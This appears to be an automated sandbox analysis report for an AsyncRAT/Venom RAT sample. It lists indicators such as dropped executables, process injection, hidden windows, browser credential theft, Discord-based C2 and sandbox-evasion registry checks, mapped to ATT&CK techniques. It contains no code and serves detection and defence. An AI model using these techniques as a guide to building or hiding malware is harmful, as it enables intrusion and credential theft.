asyncrat | a46695be041bc840e85bfe04c10149437ebf8a756aa1a000e8cb27b99b88eb74

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Venom RAT + HVNC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	ClientFix.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	Client.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	$sxr-powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
3192	Venom RAT + HVNC.exe
1132	ClientFix.bat.exe
4424	$sxr-powershell.exe
1608	$sxr-powershell.exe
4824	$sxr-powershell.exe
2644	$sxr-powershell.exe
3812	$sxr-powershell.exe
1936	$sxr-powershell.exe
3492	$sxr-powershell.exe
4256	$sxr-powershell.exe
5220	$sxr-powershell.exe
5308	$sxr-powershell.exe
5468	$sxr-powershell.exe
5184	$sxr-powershell.exe
5412	$sxr-powershell.exe
6032	$sxr-powershell.exe
712	$sxr-powershell.exe
2848	$sxr-powershell.exe
5128	$sxr-powershell.exe
5348	$sxr-powershell.exe
1156	$sxr-powershell.exe
2480	$sxr-powershell.exe
1352	$sxr-powershell.exe
5284	$sxr-powershell.exe
2060	$sxr-powershell.exe
1096	$sxr-powershell.exe
5300	$sxr-powershell.exe
6048	$sxr-powershell.exe
5420	$sxr-powershell.exe
4524	$sxr-powershell.exe
5476	$sxr-powershell.exe
5264	$sxr-powershell.exe
6696	$sxr-powershell.exe
1156	$sxr-powershell.exe
6248	$sxr-powershell.exe
5212	$sxr-powershell.exe
5756	$sxr-powershell.exe
4308	$sxr-powershell.exe
5252	$sxr-powershell.exe
6360	$sxr-powershell.exe
3536	$sxr-powershell.exe
5424	$sxr-powershell.exe
6672	$sxr-powershell.exe
6680	$sxr-powershell.exe
5372	$sxr-powershell.exe
5148	$sxr-powershell.exe
4880	$sxr-powershell.exe
7152	$sxr-powershell.exe
6832	$sxr-powershell.exe
6480	$sxr-powershell.exe
4708	$sxr-powershell.exe
3512	$sxr-powershell.exe
7020	$sxr-powershell.exe
3304	$sxr-powershell.exe
5264	$sxr-powershell.exe
7160	$sxr-powershell.exe
6504	$sxr-powershell.exe
5524	$sxr-powershell.exe
1444	$sxr-powershell.exe
1968	$sxr-powershell.exe
6068	$sxr-powershell.exe
6476	$sxr-powershell.exe
3744	$sxr-powershell.exe
5908	$sxr-powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
3192	Venom RAT + HVNC.exe
3760	Venom RAT + HVNC.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Hide Artifacts: Hidden Window 1 TTPs 64 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
8216	$sxr-powershell.exe
5220	$sxr-powershell.exe
7368	$sxr-powershell.exe
8796	$sxr-powershell.exe
8212	$sxr-powershell.exe
8240	$sxr-powershell.exe
6696	$sxr-powershell.exe
5240	$sxr-powershell.exe
8784	$sxr-powershell.exe
9144	$sxr-powershell.exe
2368	$sxr-powershell.exe
6360	$sxr-powershell.exe
8228	$sxr-powershell.exe
7248	$sxr-powershell.exe
8892	$sxr-powershell.exe
8340	$sxr-powershell.exe
3492	$sxr-powershell.exe
5756	$sxr-powershell.exe
8944	$sxr-powershell.exe
8708	$sxr-powershell.exe
5404	$sxr-powershell.exe
1608	$sxr-powershell.exe
3812	$sxr-powershell.exe
4944	$sxr-powershell.exe
9328	$sxr-powershell.exe
7296	$sxr-powershell.exe
5264	$sxr-powershell.exe
7116	$sxr-powershell.exe
5680	$sxr-powershell.exe
8976	$sxr-powershell.exe
8532	$sxr-powershell.exe
7600	$sxr-powershell.exe
5424	$sxr-powershell.exe
6560	$sxr-powershell.exe
5312	$sxr-powershell.exe
6680	$sxr-powershell.exe
7720	$sxr-powershell.exe
7840	$sxr-powershell.exe
3824	$sxr-powershell.exe
6068	$sxr-powershell.exe
3744	$sxr-powershell.exe
4336	$sxr-powershell.exe
1144	$sxr-powershell.exe
8480	$sxr-powershell.exe
3864	$sxr-powershell.exe
8708	$sxr-powershell.exe
9020	$sxr-powershell.exe
4424	$sxr-powershell.exe
5468	$sxr-powershell.exe
7080	$sxr-powershell.exe
5456	$sxr-powershell.exe
8024	$sxr-powershell.exe
4512	$sxr-powershell.exe
8992	$sxr-powershell.exe
5308	$sxr-powershell.exe
6140	$sxr-powershell.exe
4240	$sxr-powershell.exe
4264	$sxr-powershell.exe
5896	$sxr-powershell.exe
9412	$sxr-powershell.exe
2896	$sxr-powershell.exe
6480	$sxr-powershell.exe
1968	$sxr-powershell.exe
6592	$sxr-powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
149	discord.com
150	discord.com

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File created	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\Tasks\ezez	svchost.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	$sxr-powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 1132 set thread context of 2752	1132	ClientFix.bat.exe	166
PID 4424 set thread context of 180	4424	$sxr-powershell.exe	169
PID 4424 set thread context of 5552	4424	$sxr-powershell.exe	180
PID 4424 set thread context of 5752	4424	$sxr-powershell.exe	183
PID 5468 set thread context of 5644	5468	$sxr-powershell.exe	193
PID 5220 set thread context of 5892	5220	$sxr-powershell.exe	194
PID 3492 set thread context of 5692	3492	$sxr-powershell.exe	195
PID 5308 set thread context of 1968	5308	$sxr-powershell.exe	196
PID 4824 set thread context of 3544	4824	$sxr-powershell.exe	197
PID 2644 set thread context of 2060	2644	$sxr-powershell.exe	198
PID 3812 set thread context of 5296	3812	$sxr-powershell.exe	199
PID 1936 set thread context of 5920	1936	$sxr-powershell.exe	200
PID 1608 set thread context of 5996	1608	$sxr-powershell.exe	201
PID 4256 set thread context of 6060	4256	$sxr-powershell.exe	202
PID 5468 set thread context of 5228	5468	$sxr-powershell.exe	213
PID 5468 set thread context of 6088	5468	$sxr-powershell.exe	214
PID 1352 set thread context of 5232	1352	$sxr-powershell.exe	217
PID 2480 set thread context of 4384	2480	$sxr-powershell.exe	218
PID 6032 set thread context of 828	6032	$sxr-powershell.exe	219
PID 5128 set thread context of 5472	5128	$sxr-powershell.exe	220
PID 1156 set thread context of 5520	1156	$sxr-powershell.exe	221
PID 5412 set thread context of 5344	5412	$sxr-powershell.exe	222
PID 2848 set thread context of 5036	2848	$sxr-powershell.exe	223
PID 5184 set thread context of 5500	5184	$sxr-powershell.exe	224
PID 712 set thread context of 4132	712	$sxr-powershell.exe	225
PID 5348 set thread context of 4268	5348	$sxr-powershell.exe	226
PID 1132 set thread context of 220	1132	ClientFix.bat.exe	227
PID 1132 set thread context of 5216	1132	ClientFix.bat.exe	235
PID 6048 set thread context of 6736	6048	$sxr-powershell.exe	246
PID 4524 set thread context of 6812	4524	$sxr-powershell.exe	247
PID 1096 set thread context of 6888	1096	$sxr-powershell.exe	248
PID 5300 set thread context of 6968	5300	$sxr-powershell.exe	249
PID 5284 set thread context of 7132	5284	$sxr-powershell.exe	250
PID 5264 set thread context of 7100	5264	$sxr-powershell.exe	251
PID 5476 set thread context of 7016	5476	$sxr-powershell.exe	252
PID 2060 set thread context of 5352	2060	$sxr-powershell.exe	253
PID 5420 set thread context of 5696	5420	$sxr-powershell.exe	254
PID 6048 set thread context of 6616	6048	$sxr-powershell.exe	265
PID 6048 set thread context of 5276	6048	$sxr-powershell.exe	266
PID 3536 set thread context of 5308	3536	$sxr-powershell.exe	269
PID 6360 set thread context of 3856	6360	$sxr-powershell.exe	270
PID 6696 set thread context of 4320	6696	$sxr-powershell.exe	271
PID 4308 set thread context of 5364	4308	$sxr-powershell.exe	272
PID 5252 set thread context of 1468	5252	$sxr-powershell.exe	273
PID 1156 set thread context of 6104	1156	$sxr-powershell.exe	274
PID 5424 set thread context of 6608	5424	$sxr-powershell.exe	275
PID 5756 set thread context of 4588	5756	$sxr-powershell.exe	276
PID 6248 set thread context of 4420	6248	$sxr-powershell.exe	277
PID 5212 set thread context of 512	5212	$sxr-powershell.exe	278
PID 3536 set thread context of 3040	3536	$sxr-powershell.exe	289
PID 3536 set thread context of 848	3536	$sxr-powershell.exe	291
PID 7152 set thread context of 6288	7152	$sxr-powershell.exe	293
PID 6480 set thread context of 4420	6480	$sxr-powershell.exe	294
PID 4880 set thread context of 4384	4880	$sxr-powershell.exe	295
PID 5372 set thread context of 2616	5372	$sxr-powershell.exe	296
PID 6832 set thread context of 992	6832	$sxr-powershell.exe	297
PID 4708 set thread context of 868	4708	$sxr-powershell.exe	298
PID 3512 set thread context of 5472	3512	$sxr-powershell.exe	299
PID 6672 set thread context of 4792	6672	$sxr-powershell.exe	300
PID 6680 set thread context of 5100	6680	$sxr-powershell.exe	301
PID 5148 set thread context of 3744	5148	$sxr-powershell.exe	302
PID 7152 set thread context of 1680	7152	$sxr-powershell.exe	313
PID 7152 set thread context of 4704	7152	$sxr-powershell.exe	314
PID 3304 set thread context of 7056	3304	$sxr-powershell.exe	318

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-powershell.exe	ClientFix.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	ClientFix.bat.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
7088	cmd.exe
1592	PING.EXE

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe

Checks processor information in registry 2 TTPs 60 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2280	timeout.exe

Enumerates system info in registry 2 TTPs 43 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe
